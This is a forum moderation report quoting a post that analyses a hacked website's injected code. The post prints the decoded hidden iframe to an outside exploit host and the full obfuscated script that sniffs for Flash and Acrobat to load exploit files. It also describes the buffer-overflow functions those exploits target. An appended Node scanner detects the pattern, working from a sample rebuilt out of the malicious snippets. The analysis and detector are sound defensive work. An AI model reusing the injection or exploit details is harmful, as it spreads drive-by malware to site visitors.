Reported Post by h@ck3r

h@ck3r

New Member
h@ck3r has reported a post.

Reason:
Although this post is not a bad post, I just find it strange that the exact same post has been made here after I've reported this virus, as when I reported it on another forum I use daily. Check this thread: http://forum.gsmhosting.com/vbb/showthread.php?p=4446802

EXACT same content in his post, 1 post member only, and VERY similar username.

Anyway, has someone added a script to something on here, and they are able to follow us around seeing what we're posting online etc.?

Would very much appreciate a pm with some form of response please.

Thanks for your time :)
Post: Someone hacked my website!
Forum: Programming
Assigned Moderators: Daz, SpeedRazors

Posted by: nagger
Original Content:
I looked into this a little bit.

That javascript blabla comes out to:

Code:
<iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

It opens an iframe to that dodgy site which then runs the script that contains 2 infected exploits, one being a .swf file and one being a .pdf

Code:
<script>
function mjnhyua() { return 'ra'+'m'; }
for(i=0;navigator.plugins[i];i++){
		regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
var ertdfg = "dfgdfgdfgdf43565gkui";
		result=regexp.exec(navigator.plugins[i]['description']);
ertdfg = "dfgdfgdfgdf43565gkui";
		if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
ertdfg = "dfgdfgdfgdf43565gkui";
			document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
ertdfg = "dfgdfgdfgdf43565gkui";
			break;
		}
}
for(i=0;navigator.plugins[i];i++){
		name=navigator.plugins[i].name;
		if(name.indexOf('Adobe Acrobat')!=-1){
			document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
			break;
		}
}
</script>

File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125
Specifically crafted SWF (flash files) files allow remote file execution when the client has a vulnerable FlashPlayer. A malformed SWF record's value triggers a buffer overflow. The size of the SWF files vary. Usually it's a download and execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of flashplayer up to 9.0.124.0 are vulnerable (though we saw malicious pages trying to exploit only version 115 and 47).

The other file, the PDF: this is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's JavaScript engine in order to execute malicious code on the user's computer. The exploitation mainly involves the following two functions:

util.printf() - if an attacker sends a string long enough to generate a stack-based buffer overflow, he will then be able to execute arbitrary code on the user's computer with the same level of privileges as the user who opened the PDF file.

Collab.colectEmailInfo() - a stack-based buffer overflow can be caused by passing a string long enough (at least 44952 characters) as a parameter in the msg field of this function.

The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
The javascript code inside the PDF file is used to download and execute other malware on user's computer.


I can conclude that the following people are vulnerable to this exploit:
people using FlashPlayer 9.0.124.0 and below, or Adobe Acrobat Reader before 8.1.2
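The injection nagger describes has two tell-tale parts a site owner can scan for: an off-screen, zero-opacity iframe, and a script that builds the string "<iframe" out of fragments through a helper function so a plain grep for the tag finds nothing. The following Node script is an added example (not code from the thread or the forum): it inlines such helpers, collapses the concatenations, and reports hidden iframes and plugin-sniffing scripts in a page's HTML. The sample HTML is constructed from the snippets quoted above.

```javascript
// Added example, not the forum's code: scan a page's HTML for the injection pattern
// quoted above (hidden off-screen iframe plus a script that assembles "<iframe" from
// string fragments through a helper such as mjnhyua()). Run with Node.

// Collapse 'a'+'b' single-quoted literal concatenations into one literal.
function collapseConcat(js) {
  const re = /'((?:[^'\\]|\\.)*)'\s*\+\s*'((?:[^'\\]|\\.)*)'/;
  let prev;
  do { prev = js; js = js.replace(re, (m, a, b) => `'${a}${b}'`); } while (js !== prev);
  return js;
}

// Inline zero-argument helpers whose body is just `return '<literal>';`.
function inlineHelpers(js) {
  js = collapseConcat(js);
  const defRe = /function\s+(\w+)\s*\(\s*\)\s*\{\s*return\s*'([^']*)'\s*;?\s*\}/g;
  for (const [, name, value] of [...js.matchAll(defRe)]) {
    js = js.split(`${name}()`).join(`'${value}'`);
  }
  return collapseConcat(js);
}

// Return human-readable findings for one HTML document (empty array = nothing found).
function scanHtml(html) {
  const findings = [];
  for (const tag of html.match(/<iframe\b[^>]*>/gi) || []) {
    const style = (tag.match(/style\s*=\s*"([^"]*)"/i) || [])[1] || '';
    if (/opacity\s*:\s*0(?![.\d])|(?:left|top)\s*:\s*-\d|visibility\s*:\s*hidden|display\s*:\s*none/i.test(style))
      findings.push('hidden iframe: ' + tag.slice(0, 70));
  }
  for (const [, body] of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const plain = inlineHelpers(body);  // de-obfuscated script text
    if (/document\.write\s*\(\s*'<iframe/i.test(plain)) findings.push('obfuscated document.write of <iframe>');
    if (/navigator\.plugins/.test(plain) && /\.(swf|pdf)\b/i.test(plain)) findings.push('plugin sniffing for Flash/Acrobat');
  }
  return findings;
}

// Constructed sample built from the snippets quoted in this thread.
const SAMPLE_HTML = [
  '<iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html"',
  ' style="border:0px; position:relative; top:0px; left:-500px; opacity:0"></iframe>',
  "<script>function mjnhyua() { return 'ra'+'m'; }",
  "for(i=0;navigator.plugins[i];i++){ if(navigator.plugins[i].name.indexOf('Adobe Acrobat')!=-1){",
  "document.write('<if'+mjnhyua()+'e src=\"fnocs.pdf\"></if'+mjnhyua()+'e>'); break; } }</script>",
].join('\n');

console.log(scanHtml(SAMPLE_HTML));
```

Feed it each HTML and template file of the site to locate every injected copy; a clean page yields an empty array.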